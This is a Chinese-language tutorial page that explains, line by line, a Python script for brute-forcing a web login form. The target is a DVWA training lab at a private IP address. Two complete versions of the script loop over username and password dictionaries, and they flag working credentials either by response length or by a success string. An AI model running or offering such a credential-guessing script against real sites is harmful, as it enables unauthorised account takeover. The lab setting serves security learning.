腳本之家服務(wù)器常用軟件

快捷導(dǎo)航

軟件下載

android MAC 驅(qū)動(dòng)下載字體下載 DLL

源碼下載

PHP ASP.NET ASP JSP

軟件編程

C# JAVA C 語(yǔ)言 Delphi Android

網(wǎng)絡(luò)編程

PHP ASP.NET ASP JavaScript

在線工具

CSS格式化 JS格式化 Html轉(zhuǎn)化為Js

數(shù)據(jù)庫(kù)

MYSQL MSSQL oracle DB2 MARIADB

CMS

PHPCMS DEDECMS 帝國(guó)CMS WordPress

常用工具

PHP開(kāi)發(fā)工具 python Photoshop 必備軟件

Python破解網(wǎng)站登錄密碼腳本

更新時(shí)間：2022年01月14日 09:45:29 作者：陳程

這篇文章主要為大家介紹一個(gè)簡(jiǎn)單的Python暴力破解網(wǎng)站登錄密碼腳本，文中的過(guò)程講解詳細(xì)，對(duì)我們學(xué)習(xí)Python有一定的幫助，感興趣的可以學(xué)習(xí)一下

關(guān)鍵代碼解釋

url指定url地址

url?=?"http://192.168.171.2/dvwa/vulnerabilities/brute/"

header設(shè)置請(qǐng)求頭

header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=geo7gb3ehf5gfnbhrvuqu545i7'
}

payload設(shè)置請(qǐng)求參數(shù)

payload?=?{'username':username,'password':password,"Login":'Login'}

這一行的作用是作一次get請(qǐng)求，響應(yīng)信息被變量Response接收

Response?=?requests.get(url,params=payload,headers=header)

這兩行代碼循環(huán)遍歷賬號(hào)和密碼字典文件，之后給他們做笛卡爾積循環(huán)暴力破解

這種方式和burp的Intruder模塊的Cluster bomb攻擊方式一樣

for admin in open("C:\\Users\\admin\\Documents\\字典\\賬號(hào).txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密碼.txt"):

然后把循環(huán)結(jié)果存放到csv文件里，用逗號(hào)分割數(shù)據(jù)

Response.status_code是響應(yīng)的http狀態(tài)碼，len(Response.content)是http響應(yīng)報(bào)文的長(zhǎng)度

result = str(Response.status_code) + ',' + username + ','\
  + password + ',' + str(len(Response.content))
f.write(result + '\n')

完整代碼

方法一

登陸成功的和失敗返回?cái)?shù)據(jù)不同，所以數(shù)據(jù)包長(zhǎng)度也不同。包長(zhǎng)度與其他不同的數(shù)據(jù)，可能就是正確的賬號(hào)密碼。

import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"}  #代理設(shè)置，方便burp抓包查看
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}

f = open('result.csv','w')
f.write('狀態(tài)碼' + ',' + '用戶名' + ',' + '密碼' + ',' + '包長(zhǎng)度' + '\n')
for admin in open("C:\\Users\\admin\\Documents\\字典\\賬號(hào).txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密碼.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {'username':username,'password':password,"Login":'Login'}
        Response = requests.get(url,params=payload,headers=header)
        result = str(Response.status_code) + ',' + username + ','\
            + password + ',' + str(len(Response.content))
        f.write(result + '\n')
        
        print('\n完成')

運(yùn)行結(jié)果

運(yùn)行

這就是腳本發(fā)送的數(shù)據(jù)包

查看結(jié)果

查看包長(zhǎng)度與其他不同的數(shù)據(jù)，登錄測(cè)試

方法二

這個(gè)方法是根據(jù)登陸成功的返回特征來(lái)判斷是否為正確的賬號(hào)密碼，然后把正確的賬號(hào)密碼輸出到屏幕和txt文件里

主要改動(dòng)在第17到20行

import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"}  #代理設(shè)置，方便burp抓包查看
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}

f = open('result.txt','w')
for admin in open("C:\\Users\\admin\\Documents\\字典\\賬號(hào).txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密碼.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {'username':username,'password':password,"Login":'Login'}
        Response = requests.get(url,params=payload,headers=header)
        if not(Response.text.find('Welcome to the password protected area')==-1):
            result = username + ':' + password
            print(result)
            f.write(result + '\n')
            
            print('\n完成')